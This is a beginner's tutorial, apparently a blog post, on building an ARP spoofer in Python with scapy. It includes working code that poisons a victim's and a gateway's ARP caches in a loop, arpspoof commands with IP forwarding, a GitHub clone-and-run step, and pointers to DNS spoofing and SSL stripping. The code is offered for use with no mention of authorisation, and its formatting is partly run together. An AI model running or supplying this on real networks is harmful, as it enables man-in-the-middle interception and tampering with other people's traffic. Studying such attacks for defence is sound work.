As a beginner in coding, this was the second program that I had written after understanding the basic concepts of programming. I have explained some of them in a brief manner.
What does an ARP spoofer do?
Address Resolution Protocol is used for mapping a dynamic IP address to a permanent machine address (MAC Address). The attackers take advantage of this protocol by sending fake ARP messages to the target machine in a Local Area Network. By doing this, the address of the attacker gets mapped with the IP of a legitimate computer/ server on the same network. This helps the attacker to intercept or modify the data in transit.
We will write a program to fool the victim machine, so that it thinks that we are the gateway. Similarly, we will make the gateway think that we are holding the victim IP.
Step 1 : To do this, we will be importing scapy module which will be used throughout the program. Scapy is a very useful python module used to work with the network packets.
import scapy.all as scapy
import timeStep 2 : Defining a function for spoofing :
def spoof(targ, spoof):
packet = scapy.ARP(op=2, pdst=targ, hwdst=mac(targ),psrc=spoof) scapy.send(packet, verbose=False)
Step 3 : Allowing the user to input the target and gateway address according to his choice.
target_ip = input(“[*] Enter Target IP > “) # Enter your target IPgateway_ip = input(“[*] Enter Gateway IP > “) # Enter your gateway’s IP
Step 4 : Now to get the MAC Address of the target machine, we will be defining the following function :
def mac(ip): arp_request = scapy.ARP(pdst=ip)
br = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_req_br = br / arp_request#Creating a list list_1 = scapy.srp(arp_req_br, timeout=5, verbose=False)[0]
return list_1[0][1].hwsrc
Step 5 : Printing the results :
while True: spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
countpackets = countpackets + 2 print("\r[*] Packets Sent " + str(countpackets), end="") time.sleep(2) # Waits for two seconds
Step 6 : When the user presses Ctrl + c, we intend to print the following message and then stop the program so we will be defining the following function.
try:
countpackets = 0
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
countpackets = countpackets + 2
print(“\r[*] Packets Sent “ + str(countpackets), end=””)
time.sleep(2) # Waits for two secondsexcept KeyboardInterrupt:
print(“\nCtrl + C pressed…………. Quitting. “)
reset(gateway_ip, target_ip)
reset(target_ip, gateway_ip)
print(“[*] Arp Spoof Stopped, IP restored. “)
Step 7 : At the end, we will conclude with resetting the victim and gateway IP to their original MAC Addresses.
def reset(dest_ip, src_ip): dest_mac = mac(dest_ip)
source_mac = mac(src_ip)
packet = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, psrc=src_ip, hwsrc=source_mac)scapy.send(packet, verbose=False)
After performing all the above steps, our code will look something like this :
Congratulations! we are done with the coding part.
- Arpspoof is also an inbuilt tool in kali. You can run “ apt-get install dsniff” to download it. Following are the commands to run arpspoof :
# echo 1 > /proc/sys/net/ipv4/ip_forwardwe run the above command to forward the traffic.
# arpspoof -i <interface> -t <victim ip> <gateway ip>
# arpspoof -i <interface> -t <gateway ip> <victim ip>We can perform the other Man-in-the-Middle attacks after performing ARP spoof on the target, namely DNS spoofing, SSL striping and many more.
2. You can also use my github code to perform arp spoofing or to check how the above code works, run the following commands :
# echo 1 > /proc/sys/net/ipv4/ip_forward
# apt-get install python3 python3-scapy
# git clone https://github.com/An4ndita/ARP-Spoofer.git
# cd ARP-Spoofer
# python3 arp.pyYou can find the victim’s IP address by running the following command :
# netdiscover -i <interface>or you can also use my github code elaborated in the previous article : https://github.com/An4ndita/Network-Scanner.git
and the gateway address by running :
# route -nThank you! Hope that you find it useful.! 😊 👍
